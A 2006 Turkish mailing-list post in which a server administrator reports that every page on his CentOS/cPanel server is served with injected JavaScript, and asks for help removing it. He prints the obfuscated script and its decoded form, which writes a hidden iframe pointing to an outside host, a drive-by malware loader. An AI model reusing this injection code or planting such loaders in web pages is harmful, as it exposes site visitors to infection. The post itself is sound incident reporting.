From: Volkan TOP (v@trinternet.com)
Date: Fri 26 May 2006 - 21:45:53 GMT
iyi günler,
Centos - Cpanel 2 lisinin çalıştığı bir linux sunucu geldi elime.
ve sunucuda çok ilginç bir güvenlik açığı mevcut. Nereden nasıl ne
şekilde yapıldı bilmiyorum. En azından şu etapta bunu durdurmam
gerekiyor.
.html .php v.b. dosyalar çağrıldığında browser'dan...
Alt kısmına baya bir boşluk bırakılmış şekilde ekteki javascript kodu
eklenmiş biçimde ekrana geliyor.
Oysaki bu dosyaların içeriğinde bu tarzda bir kod mevcut değil.
işin ilginç yanı , bu olay sunucuda barındırılan bütün domain ler
içinde geçerli.
Php.ini yi httpd.conf' u v.s. leri kontrol ettim ama farklı bir şeye
rastlamadım ne tavsiye edersiniz.? sunucuda normal dışı herhangi bir
olay yada horse & trojan'da mevcut degil.
Java Kodu ----------------------------------------------------------
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%6B%29%7B%76%61%72%20%6B%31%3D%75%6E%65%73%63%61%70%65%28%6B%2E%73%75%62%73%74%72%28%30%2C%6B%2E%6C%65%6E%67%74%68%2d%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%6B%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%6B%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2d%6B%2E%73%75%62%73%74%72%28%6B%2E%6C%65%6E%67%74%68%2d%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('-%3BK%7Bkzqx%7C-%3A8tivo%7Diom-%3BLri%7Ei%7Bkzqx%7C-%3BMlwk%7Dumv%7C6%7Fzq%7Cm-%3A%3A-%3BKlq%7E-%3A8%7B%7C%81tm-%3BL-%3DK-%3A%3Alq%7Bxti%81-%3BIvwvm-%3DK-%3A%3A-%3BM-%3BKqnzium-%3A8%7Bzk-%3BLp%7C%7Cx-%3BI77pw%7C%7B%7Ci%7C6vm%7C7k%82j7mvoqvm6xpx-%3BM-%3BK7qnzium-%3BM-%3BK7lq%7E-%3BM-%3A%3A-%3AA-%3BJ-%3BK7%7Bkzqx%7C-%3BM8')</script>
------ Java kodunu decode ettim :) ve kim yaptıysa baya güzel bir
olay. bütün istenen sayfaları frame leyip alıyor.istediği kodu
sunucudaki her istenen sayfada çalıştırabilecek.? hiç bir yerdede
böyle bir şeye rastlamadım süper bişi.:)
çözülmüş hali.
JAVA KOd-----------------------------------------------------------
function dF(k){var k1=unescape(k.substr(0,k.length-1)); var t='';for(i=0;i<k1.length;i++)t+=String.fromCharCode(k1.charCodeAt(i)-k.substr(k.length-1,1));document.write(unescape(t));}
document.write("<div style=\"display:none\"><iframe src=http://hotstat.net/czb/engine.php></iframe></div>");
Yardımlarınızı ve tavsiyelerinizi bekliyorum.
İyi günler.
Volkan TOP
_______________________________________________
Linux-guvenlik mailing list
Linux-guvenlik@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik